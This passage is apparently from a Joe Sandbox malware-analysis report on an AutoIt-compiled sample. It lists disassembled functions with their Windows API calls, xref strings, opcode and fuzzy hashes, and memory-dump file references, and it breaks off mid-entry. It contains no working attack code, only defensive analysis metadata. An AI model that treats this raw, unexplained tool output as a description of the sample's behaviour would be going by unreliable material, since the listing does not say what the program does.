Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63885197a0039cfb8ed727331ae89e39becca0183403dd3076bec99e7f359b3f
Instruction ID: 82c90741e99368018144739cf8ae0c48662aef5eaf535fa062569193b077255e
Opcode Fuzzy Hash: 63885197a0039cfb8ed727331ae89e39becca0183403dd3076bec99e7f359b3f
Instruction Fuzzy Hash: ACB10020E2AF504DD32396399835336BB9CAFBB2D5F52D71BFC2A70D22EB2185834141

Function 001E4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001E4C4A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: c63aacbeb05c20cb6d9694f4e58f4c641863ff57365070ecdeaec5a939857001
Instruction ID: 61172ac39997d3b0ee71c3a300a94238ddb465f038969e211830d5c8c36c2a25
Opcode Fuzzy Hash: c63aacbeb05c20cb6d9694f4e58f4c641863ff57365070ecdeaec5a939857001
Instruction Fuzzy Hash: 17D05E91165F893BEE2C07229E0FF7E0108E300782FF181897501CB0C2EE805C405030

Function 001D87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001D8389), ref: 001D87D1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 4ba39ed57d0c6377bd1e7e0fea6e78bdc880acb7803ef2fd5511ff43b675cec5
Instruction ID: a5771608728d8af3b7a04a11a6841d7eade82cd19f8e158114275e4da68c5c5c
Opcode Fuzzy Hash: 4ba39ed57d0c6377bd1e7e0fea6e78bdc880acb7803ef2fd5511ff43b675cec5
Instruction Fuzzy Hash: E4D05E322A060EABEF018EA4ED05EAF3B6AEB04B01F408111FE15C50A1C775D835AB60

Function 001AA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 001AA12A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 163e3cd1dcffd89569df6d52e55534e31fc32f497d8dda8a1e09e43c307ec38d
Instruction ID: 37f4a234871d6a48fa4b757e112c5fa47bcd1a87ebf335bcb87b2144b9575782
Opcode Fuzzy Hash: 163e3cd1dcffd89569df6d52e55534e31fc32f497d8dda8a1e09e43c307ec38d
Instruction Fuzzy Hash: A6A0113008820CABCA002B82FC08888BFACEA002A0B0080A0FC0C808228B32A8208A80

Function 00198808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b017bc24ad0d812d850fe2ee87fe4730a8704851cd1edfe4a5023ea957a2c831
Instruction ID: 74574ffe5b091bbc2eb878889fe43b813a02cf767e41389f7a72a20c30ba0962
Opcode Fuzzy Hash: b017bc24ad0d812d850fe2ee87fe4730a8704851cd1edfe4a5023ea957a2c831
Instruction Fuzzy Hash: 0C221230A04516DBDF3C8A68C49477CB7A2FF82348F39806BE9568B692DB74DD91CB41

Function 001A21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 1de97c7a39804ecd866896cf0bd6aab96188042f4824c5fe48a221a7db27fae1
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 99C1963A2051A30ADF2E467D843413EFAA16FA37B171A075ED8B7DB1D4EF24C925D620

Function 001A25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 943bb50080c0d3793201a84791ad7c74f5e6b96fed9cc26a7aa59bce1b965981
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 12C1953A2051A30ADF2E467EC43403EBAA15FA37B171A076DD8B7DB1D5EF20C925D620

Function 001A1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 9120db9dcf3f79eb57d3eac466089474171a80c5bc290a5df99136516febe4b0
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: CFC1923A2051A319DF2E4679C43813EBAA15FA37B1B1A176DD8B7DB1C4EF20C925D620

Function 01163B28 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: e918b6220aba1511599a5b97518e3065a675481ebd34b3da64dc18cb8a98b38d
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: B041D371D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 01163A18 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: faac549950c1b5666a373f5c30a1a83fb8344d5b6475b7de5b6154969688b642
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: E1019278E11109EFCB48DF98C5909AEF7B9FB48310F208699D819E7341D731AE51DB80

Function 011639B8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: ffcb2c65a41bdf76c9a973d0304ea974edaeca62d7cc0f1e3ee8f4b1820bc709
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: AE018078A10109EFCB48DF98C5909AEF7B9FB48310F208699D819A7301D731AE51DB90

Function 01162398 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 001F7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001F785B
DeleteObject.GDI32(00000000), ref: 001F786D
DestroyWindow.USER32 ref: 001F787B
GetDesktopWindow.USER32 ref: 001F7895
GetWindowRect.USER32(00000000), ref: 001F789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001F79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001F79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7A35
GetClientRect.USER32(00000000,?), ref: 001F7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001F7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7ABB
GlobalLock.KERNEL32(00000000), ref: 001F7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7AD3
GlobalUnlock.KERNEL32(00000000), ref: 001F7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7AE3
GlobalFree.KERNEL32(00000000), ref: 001F7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00212CAC,00000000), ref: 001F7B16
GlobalFree.KERNEL32(00000000), ref: 001F7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 001F7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 001F7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7D7A

Strings

, xrefs: 001F7D00
AutoIt v3, xrefs: 001F7A2D
static, xrefs: 001F7A75, 001F7BCC
DISPLAY, xrefs: 001F7BDD

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d98ec0b45af4f07faf6bbb8c83031cc0563a8cc21dc0f6aa4a5327b2e763e843
Instruction ID: 43e48a0639cebc1628c2c10e042c7bba26433309e716ee1ac93b5d42b9020400
Opcode Fuzzy Hash: d98ec0b45af4f07faf6bbb8c83031cc0563a8cc21dc0f6aa4a5327b2e763e843
Instruction Fuzzy Hash: C7026A71900219AFDB14DFA4DD89EBEBBB9FB49310F148159F915AB2A2C770AD01CB60

Function 0020356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0020F910), ref: 00203627
IsWindowVisible.USER32(?), ref: 0020364B

Strings

HIDEDROPDOWN, xrefs: 00203700
UNCHECK, xrefs: 00203883
GETLINE, xrefs: 0020399B
GETCURRENTCOL, xrefs: 00203928
ISENABLED, xrefs: 0020366B
SENDCOMMANDID, xrefs: 002039DA
EDITPASTE, xrefs: 0020395F
SHOWDROPDOWN, xrefs: 002036E0
CHECK, xrefs: 0020386D
SETCURRENTSELECTION, xrefs: 002037B6
TABRIGHT, xrefs: 0020369D
TABLEFT, xrefs: 00203687
GETSELECTED, xrefs: 002038A3
FINDSTRING, xrefs: 00203776
GETCURRENTSELECTION, xrefs: 002037E3
ISCHECKED, xrefs: 00203839
DELSTRING, xrefs: 00203749
GETLINECOUNT, xrefs: 002038C6
GETCURRENTLINE, xrefs: 002038ED
CURRENTTAB, xrefs: 002036BD
SELECTSTRING, xrefs: 00203806
ISVISIBLE, xrefs: 00203637
ADDSTRING, xrefs: 00203716

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 5987020623dee29f708c859f992e375e5cb4b6cf7a0f56f90eabc7b9918f6dee
Instruction ID: 8eca32217d0fa8ea5cbc9433240e4ec413c07cf096e2f8cb5e3c58cdac9236c7
Opcode Fuzzy Hash: 5987020623dee29f708c859f992e375e5cb4b6cf7a0f56f90eabc7b9918f6dee
Instruction Fuzzy Hash: 1ED1A4B42243019FCB04EF10C455A6EB7E9AFA6354F184459F8825B3E3DB71EE5ACB41

Function 0020A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0020A630
GetSysColorBrush.USER32(0000000F), ref: 0020A661
GetSysColor.USER32(0000000F), ref: 0020A66D
SetBkColor.GDI32(?,000000FF), ref: 0020A687
SelectObject.GDI32(?,00000000), ref: 0020A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0020A6C1
GetSysColor.USER32(00000010), ref: 0020A6C9
CreateSolidBrush.GDI32(00000000), ref: 0020A6D0
FrameRect.USER32(?,?,00000000), ref: 0020A6DF
DeleteObject.GDI32(00000000), ref: 0020A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0020A731
FillRect.USER32(?,?,00000000), ref: 0020A763
GetWindowLongW.USER32(?,000000F0), ref: 0020A78E

Part of subcall function 0020A8CA: GetSysColor.USER32(00000012), ref: 0020A903
Part of subcall function 0020A8CA: SetTextColor.GDI32(?,?), ref: 0020A907
Part of subcall function 0020A8CA: GetSysColorBrush.USER32(0000000F), ref: 0020A91D
Part of subcall function 0020A8CA: GetSysColor.USER32(0000000F), ref: 0020A928
Part of subcall function 0020A8CA: GetSysColor.USER32(00000011), ref: 0020A945
Part of subcall function 0020A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0020A953
Part of subcall function 0020A8CA: SelectObject.GDI32(?,00000000), ref: 0020A964
Part of subcall function 0020A8CA: SetBkColor.GDI32(?,00000000), ref: 0020A96D
Part of subcall function 0020A8CA: SelectObject.GDI32(?,?), ref: 0020A97A
Part of subcall function 0020A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0020A999
Part of subcall function 0020A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0020A9B0
Part of subcall function 0020A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0020A9C5
Part of subcall function 0020A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0020A9ED

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 9235590ed29f352ab1f8c2738b11d1ed623ea2245dcd7c5d2120b52ca36003ad
Instruction ID: c791a135a69ea8fe28143f95a209b99140248c8d4a679f13668a1f8f515edd0e
Opcode Fuzzy Hash: 9235590ed29f352ab1f8c2738b11d1ed623ea2245dcd7c5d2120b52ca36003ad
Instruction Fuzzy Hash: B3918B72048301EFCB609F64ED4CA5BBBA9FB89321F504B29F962961E2D771D844CB52

Function 00182C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00182CA2
DeleteObject.GDI32(00000000), ref: 00182CE8
DeleteObject.GDI32(00000000), ref: 00182CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00182CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00182D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 001BC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001BC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001BC89D

Part of subcall function 00181B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00182036,?,00000000,?,?,?,?,001816CB,00000000,?), ref: 00181B9A

SendMessageW.USER32(?,00001053), ref: 001BC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001BC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001BC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001BC912

Strings

0, xrefs: 001BC731

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: fc29a8a59a8b28cae6c493d43fb2600ab23a2af39deab32930febda422703047
Instruction ID: aaa6117f4cf0e2b7fb70f4b79932fe9b33baefc13b5fa036db3d7967fad1789b
Opcode Fuzzy Hash: fc29a8a59a8b28cae6c493d43fb2600ab23a2af39deab32930febda422703047
Instruction Fuzzy Hash: 1F128B70604201EFDB25DF24C988BA9BBE5FF54300F544569F89ACB662CB31E942CFA1

Function 001F74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 001F74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001F759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001F75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001F75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 001F7633
GetClientRect.USER32(00000000,?), ref: 001F763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 001F7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001F7692
GetStockObject.GDI32(00000011), ref: 001F76A2
SelectObject.GDI32(00000000,00000000), ref: 001F76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001F76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001F76BF
DeleteDC.GDI32(00000000), ref: 001F76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001F76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 001F770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 001F7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001F775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 001F776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 001F779B
GetStockObject.GDI32(00000011), ref: 001F77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001F77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001F77BB

Strings

msctls_progress32, xrefs: 001F773C
static, xrefs: 001F767D, 001F7795
AutoIt v3, xrefs: 001F762B
DISPLAY, xrefs: 001F7688

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 55ada0f3b584c26fff744e22372556c70318d0ac77b93f23d164a1bae374ee36
Instruction ID: e3794b39245a38b4a00529ad2898d8d9e97551ef71581e9a6259cf07a4f0c30a
Opcode Fuzzy Hash: 55ada0f3b584c26fff744e22372556c70318d0ac77b93f23d164a1bae374ee36
Instruction Fuzzy Hash: 21A14F71A40619BFEB14DBA4ED4AFBEBBA9EB05710F044115FA15A72E1D7B0AD00CF60

Function 001EAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001EAD1E
